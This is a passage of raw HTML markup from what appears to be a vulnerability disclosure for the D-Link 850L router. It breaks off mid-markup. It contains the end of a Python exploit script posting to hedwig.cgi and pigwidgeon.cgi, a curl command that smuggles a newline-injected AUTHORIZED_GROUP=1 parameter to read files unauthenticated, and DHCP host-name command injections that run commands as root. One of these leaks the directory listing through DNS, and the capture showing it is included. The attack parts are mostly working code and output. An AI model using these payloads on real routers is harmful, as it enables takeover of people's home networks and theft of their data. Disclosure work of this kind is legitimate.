id=\"crayon-598a38e8ac95e008713212-122\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-123\"><span class=\"crayon-v\">headers<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-s\">&#8220;Content-Type&#8221;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;text\/xml&#8221;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-124\"><span class=\"crayon-v\">data<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">lxml<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">etree<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">tostring<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">tree<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-125\"><span class=\"crayon-v\">resp<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">session<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">post<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">urljoin<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">TARGET<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;\/hedwig.cgi&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">headers<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">headers<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-126\"><span class=\"crayon-p\"># print(resp.text)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-127\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-128\"><span class=\"crayon-v\">tree<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">lxml<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">etree<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">fromstring<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">resp<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">content<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-129\"><span class=\"crayon-v\">result<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">tree<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">findtext<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;result&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-130\"><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">result<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">lower<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">!=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;ok&#8221;<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-131\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">print<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;Failed!&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-132\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">print<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">resp<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">text<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-133\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">exit<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-134\"><span class=\"crayon-e\">print<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;OK&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-135\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-136\"><span class=\"crayon-p\">############################################################<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-137\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-138\"><span class=\"crayon-e\">print<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;pigwidgeon&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-139\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-140\"><span class=\"crayon-v\">data<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-s\">&#8220;ACTIONS&#8221;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;SETCFG,ACTIVATE&#8221;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-141\"><span class=\"crayon-v\">resp<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">session<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">post<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">urljoin<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">TARGET<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;\/pigwidgeon.cgi&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-142\"><span class=\"crayon-p\"># print(resp.text)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-143\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-144\"><span class=\"crayon-v\">tree<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">lxml<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">etree<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">fromstring<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">resp<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">content<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-145\"><span class=\"crayon-v\">result<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">tree<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">findtext<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;result&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-146\"><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">result<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">lower<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">!=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;ok&#8221;<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-147\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">print<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;Failed!&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-148\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">print<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">resp<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">text<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac95e008713212-149\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">exit<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac95e008713212-150\"><span class=\"crayon-e\">print<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;OK&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0135 seconds] -->  <\/p>\n<p><strong>Remote Unauthenticated Information Disclosure via WAN and LAN<\/strong><br \/> When an Admin is log-in to D-Link 850L it will trigger the global variable: <em>$AUTHORIZED_GROUP >= 1<\/em>.<\/p>\n<p>An attacker can use this global variable to bypass security checks and use it to read arbitrary files.<\/p>\n<p><strong>Proof of Concept<\/strong><\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-598a38e8ac963141374217\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> $ curl -d &#8220;SERVICES=DEVICE.ACCOUNT&amp;x=y%0aAUTHORIZED_GROUP=1&#8221;  &#8220;http:\/\/IP\/getcfg.php&#8221;<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac963141374217-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598a38e8ac963141374217-2\">2<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac963141374217-1\"><span class=\"crayon-sy\">$<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">curl<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-i\">d<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;SERVICES=DEVICE.ACCOUNT&amp;x=y%0aAUTHORIZED_GROUP=1&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-598a38e8ac963141374217-2\"><span class=\"crayon-s\">&#8220;http:\/\/IP\/getcfg.php&#8221;<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0003 seconds] -->  <\/p>\n<p><strong>Unauthorized Remote Code Execution as root via LAN<\/strong><\/p>\n<p>The D-Link 850L runs <em>dnsmasq<\/em> daemon as root. The daemon execute the &#8220;host-name&#8221; parameter from the DHCP server. <\/p>\n<p><strong>Proof of Concept<\/strong><br \/> In order to exploit this vulnerability, we need to be on the same LAN with the victim and to set a DHCP server in our control.<\/p>\n<p>In this Proof of Concept we will use a Kali machine.<\/p>\n<p>The attacker need to edit the <em>\/etc\/dhcp\/dhclient.conf<\/em> file and change the <em>host-name<\/em> field to the command we want to execute.<\/p>\n<p>The following DHCP request will execute ping command on the router:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-598a38e8ac966241161931\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> send host-name = &#8220;;ping 192.168.0.100&#8221;;<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac966241161931-1\">1<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac966241161931-1\"><span class=\"crayon-e\">send <\/span><span class=\"crayon-v\">host<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">name<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;;ping 192.168.0.100&#8221;<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0003 seconds] -->  <\/p>\n<p>In order to see the results you need to sniff the network and inspect the packets<\/p>\n<p>Using DNS to exfiltrate information:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-598a38e8ac969009217806\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> send host-name = &#8220;;for i in `ls \/`; do ping $i;done&#8221;;<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac969009217806-1\">1<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-598a38e8ac969009217806-1\"><span class=\"crayon-e\">send <\/span><span class=\"crayon-v\">host<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">name<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;;for i in `ls \/`; do ping $i;done&#8221;<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0002 seconds] -->  <\/p>\n<p>If we will sniff the network we will see the following:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-598a38e8ac96b002262104\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> 17:41:42.963917 IP 192.168.1.1 &gt; 192.168.1.100: ICMP 192.168.1.1 udp port 53 unreachable, length 36  17:41:44.955685 IP 192.168.1.100.37895 &gt; 192.168.1.1.53: 2+ AAAA? www. (21)  17:41:44.955754 IP 192.168.1.1 &gt; 192.168.1.100: ICMP 192.168.1.1 udp port 53 unreachable, length 36  17:41:44.956251 IP 192.168.1.100.51733 &gt; 192.168.1.1.53: 3+ AAAA? www. (21)  17:41:44.956282 IP 192.168.1.1 &gt; 192.168.1.100: ICMP 192.168.1.1 udp port 53 unreachable, length 36  17:41:44.956797 IP 192.168.1.100.52958 &gt; 192.168.1.1.53: 4+ AAAA? www. (21)  17:41:44.956821 IP 192.168.1.1 &gt; 192.168.1.100: ICMP 192.168.1.1 udp port 53 unreachable, length 36  17:41:44.957639 IP 192.168.1.100.49007 &gt; 192.168.1.1.53: 5+ A? www. (21)  17:41:44.957660 IP 192.168.1.1 &gt; 192.168.1.100: ICMP 192.168.1.1 udp port 53 unreachable, length 36  17:41:44.958327 IP 192.168.1.100.42641 &gt; 192.168.1.1.53: 6+ A? www. (21)  17:41:44.958351 IP 192.168.1.1 &gt; 192.168.1.100: ICMP 192.168.1.1 udp port 53 unreachable, length 36  17:41:44.958837 IP 192.168.1.100.36077 &gt; 192.168.1.1.53: 7+ A? www. (21)  17:41:44.958857 IP 192.168.1.1 &gt; 192.168.1.100: ICMP 192.168.1.1 udp port 53 unreachable, length 36  17:41:44.965678 IP 192.168.1.100.49884 &gt; 192.168.1.1.53: 2+ AAAA? var. (21)  17:41:44.965704 IP 192.168.1.1 &gt; 192.168.1.100: ICMP 192.168.1.1 udp port 53 unreachable, length 36  17:41:44.969792 IP 192.168.1.100.53144 &gt; 192.168.1.1.53: 3+ AAAA? var. (21)  17:41:44.969820 IP 192.168.1.1 &gt; 192.168.1.100: ICMP 192.168.1.1 udp port 53 unreachable, length 36  17:41:44.970305 IP 192.168.1.100.32949 &gt; 192.168.1.1.53: 4+ AAAA? var. (21)  17:41:44.970326 IP 192.168.1.1 &gt; 192.168.1.100: ICMP 192.168.1.1 udp port 53 unreachable, length 36  17:41:44.970971 IP 192.168.1.100.48094 &gt; 192.168.1.1.53: 5+ A? var. (21)  17:41:44.970993 IP 192.168.1.1 &gt; 192.168.1.100: ICMP 192.168.1.1 udp port 53 unreachable, length 36  17:41:44.971505 IP 192.168.1.100.52246 &gt; 192.168.1.1.53: 6+ A? var. (21)  17:41:44.971516 IP 192.168.1.1 &gt; 192.168.1.100: ICMP 192.168.1.1 udp port 53 unreachable, length 36  17:41:44.972015 IP 192.168.1.100.41323 &gt; 192.168.1.1.53: 7+ A? var. (21)  17:41:44.972036 IP 192.168.1.1 &gt; 192.168.1.100: ICMP 192.168.1.1 udp port 53 unreachable, length 36  17:41:44.974624 IP 192.168.1.100.50795 &gt; 192.168.1.1.53: 2+ AAAA? usr. (21)  17:41:44.974653 IP 192.168.1.1 &gt; 192.168.1.100: ICMP 192.168.1.1 udp port 53 unreachable, length 36  17:41:44.975316 IP 192.168.1.100.38359 &gt; 192.168.1.1.53: 3+ AAAA? usr. (21)  17:41:44.975337 IP 192.168.1.1 &gt; 192.168.1.100: ICMP 192.168.1.1 udp port 53 unreachable, length 36  17:41:44.975827 IP 192.168.1.100.55240 &gt; 192.168.1.1.53: 4+ AAAA? usr. (21)  17:41:44.975848 IP 192.168.1.1 &gt; 192.168.1.100: ICMP 192.168.1.1 udp port 53 unreachable, length 36  17:41:44.976660 IP 192.168.1.100.44499 &gt; 192.168.1.1.53: 5+ A? usr. (21)  17:41:44.976668 IP 192.168.1.1 &gt; 192.168.1.100: ICMP 192.168.1.1 udp port 53 unreachable, length 36  17:41:44.979721 IP 192.168.1.100.57446 &gt; 192.168.1.1.53: 6+ A? usr. (21)  17:41:44.979748 IP 192.168.1.1 &gt; 192.168.1.100: ICMP 192.168.1.1 udp port 53 unreachable, length 36  17:41:44.980401 IP 192.168.1.100.35172 &gt; 192.168.1.1.53: 7+ A? usr. (21)  17:41:44.980422 IP 192.168.1.1 &gt; 192.168.1.100: ICMP 192.168.1.1 udp port 53 unreachable, length 36  17:41:44.983041 IP 192.168.1.100.60090 &gt; 192.168.1.1.53: 2+ AAAA? tmp. (21)<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac96b002262104-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598a38e8ac96b002262104-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac96b002262104-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598a38e8ac96b002262104-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac96b002262104-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598a38e8ac96b002262104-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac96b002262104-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598a38e8ac96b002262104-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac96b002262104-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598a38e8ac96b002262104-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac96b002262104-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-598a38e8ac96b002262104-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-598a38e8ac96b002262104-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" 